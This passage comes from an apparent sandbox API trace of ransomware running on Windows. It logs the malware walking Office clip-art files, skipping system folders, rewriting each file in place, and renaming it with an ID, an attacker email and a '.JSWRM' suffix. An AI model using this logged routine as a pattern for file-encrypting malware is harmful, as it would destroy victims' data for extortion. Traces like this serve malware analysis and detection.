office\\root\\clipart\\pub60cor\\j0106958.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0081.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0081.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0081.722] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbcc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107024.WMF", cAlternateFileName="")) returned 1 [0081.722] lstrcmpiW (lpString1="J0107024.WMF", lpString2=".") returned 1 [0081.722] lstrcmpiW (lpString1="J0107024.WMF", lpString2="..") returned 1 [0081.722] lstrcmpiW (lpString1="J0107024.WMF", lpString2="...") returned 1 [0081.722] lstrcmpiW (lpString1="J0107024.WMF", lpString2="windows") returned -1 [0081.722] lstrcmpiW (lpString1="J0107024.WMF", lpString2="recovery") returned -1 [0081.722] lstrcmpiW (lpString1="J0107024.WMF", lpString2="perflogs") returned -1 [0081.722] lstrcmpiW (lpString1="J0107024.WMF", lpString2="documents and settings") returned 1 [0081.722] lstrcmpiW (lpString1="J0107024.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.722] lstrcmpiW (lpString1="J0107024.WMF", lpString2="system volume information") returned -1 [0081.722] lstrcmpiW (lpString1="J0107024.WMF", lpString2="msocache") returned -1 [0081.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0081.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107024.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107024.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107024.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0081.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0081.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107024.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107024.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107024.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0081.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0081.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0081.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0081.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.723] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3020) returned 1 [0081.723] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbc0) returned 0x23fc98 [0081.723] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xbc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xbc0, lpOverlapped=0x0) returned 1 [0081.725] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.725] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xbc0, lpOverlapped=0x0) returned 1 [0081.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0081.725] CloseHandle (hObject=0x314) returned 1 [0081.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0081.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0081.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0081.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0081.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0081.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0081.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.726] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0081.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0081.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0081.743] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1dd0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107026.WMF", cAlternateFileName="")) returned 1 [0081.744] lstrcmpiW (lpString1="J0107026.WMF", lpString2=".") returned 1 [0081.744] lstrcmpiW (lpString1="J0107026.WMF", lpString2="..") returned 1 [0081.744] lstrcmpiW (lpString1="J0107026.WMF", lpString2="...") returned 1 [0081.744] lstrcmpiW (lpString1="J0107026.WMF", lpString2="windows") returned -1 [0081.744] lstrcmpiW (lpString1="J0107026.WMF", lpString2="recovery") returned -1 [0081.744] lstrcmpiW (lpString1="J0107026.WMF", lpString2="perflogs") returned -1 [0081.744] lstrcmpiW (lpString1="J0107026.WMF", lpString2="documents and settings") returned 1 [0081.744] lstrcmpiW (lpString1="J0107026.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.744] lstrcmpiW (lpString1="J0107026.WMF", lpString2="system volume information") returned -1 [0081.744] lstrcmpiW (lpString1="J0107026.WMF", lpString2="msocache") returned -1 [0081.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0081.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107026.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107026.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107026.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0081.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0081.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107026.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107026.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107026.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0081.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0081.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0081.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0081.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.745] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7632) returned 1 [0081.745] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dd0) returned 0x205850 [0081.745] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1dd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1dd0, lpOverlapped=0x0) returned 1 [0081.789] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.789] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1dd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1dd0, lpOverlapped=0x0) returned 1 [0081.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.790] CloseHandle (hObject=0x314) returned 1 [0081.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0081.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0081.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0081.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0081.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0081.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0081.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.790] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0081.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0081.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0081.791] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2358, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107042.WMF", cAlternateFileName="")) returned 1 [0081.791] lstrcmpiW (lpString1="J0107042.WMF", lpString2=".") returned 1 [0081.791] lstrcmpiW (lpString1="J0107042.WMF", lpString2="..") returned 1 [0081.791] lstrcmpiW (lpString1="J0107042.WMF", lpString2="...") returned 1 [0081.791] lstrcmpiW (lpString1="J0107042.WMF", lpString2="windows") returned -1 [0081.791] lstrcmpiW (lpString1="J0107042.WMF", lpString2="recovery") returned -1 [0081.791] lstrcmpiW (lpString1="J0107042.WMF", lpString2="perflogs") returned -1 [0081.791] lstrcmpiW (lpString1="J0107042.WMF", lpString2="documents and settings") returned 1 [0081.791] lstrcmpiW (lpString1="J0107042.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.791] lstrcmpiW (lpString1="J0107042.WMF", lpString2="system volume information") returned -1 [0081.791] lstrcmpiW (lpString1="J0107042.WMF", lpString2="msocache") returned -1 [0081.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0081.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107042.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107042.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107042.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0081.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0081.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107042.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107042.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107042.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0081.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0081.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0081.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0081.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.792] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9048) returned 1 [0081.792] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2350) returned 0x24d210 [0081.792] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2350, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2350, lpOverlapped=0x0) returned 1 [0081.794] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.794] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2350, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2350, lpOverlapped=0x0) returned 1 [0081.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.794] CloseHandle (hObject=0x314) returned 1 [0081.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0081.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0081.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0081.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0081.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0081.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0081.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0081.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0081.795] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0081.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0081.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0081.795] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3734, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107090.WMF", cAlternateFileName="")) returned 1 [0081.796] lstrcmpiW (lpString1="J0107090.WMF", lpString2=".") returned 1 [0081.796] lstrcmpiW (lpString1="J0107090.WMF", lpString2="..") returned 1 [0081.796] lstrcmpiW (lpString1="J0107090.WMF", lpString2="...") returned 1 [0081.796] lstrcmpiW (lpString1="J0107090.WMF", lpString2="windows") returned -1 [0081.796] lstrcmpiW (lpString1="J0107090.WMF", lpString2="recovery") returned -1 [0081.796] lstrcmpiW (lpString1="J0107090.WMF", lpString2="perflogs") returned -1 [0081.796] lstrcmpiW (lpString1="J0107090.WMF", lpString2="documents and settings") returned 1 [0081.796] lstrcmpiW (lpString1="J0107090.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.796] lstrcmpiW (lpString1="J0107090.WMF", lpString2="system volume information") returned -1 [0081.796] lstrcmpiW (lpString1="J0107090.WMF", lpString2="msocache") returned -1 [0081.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0081.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107090.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 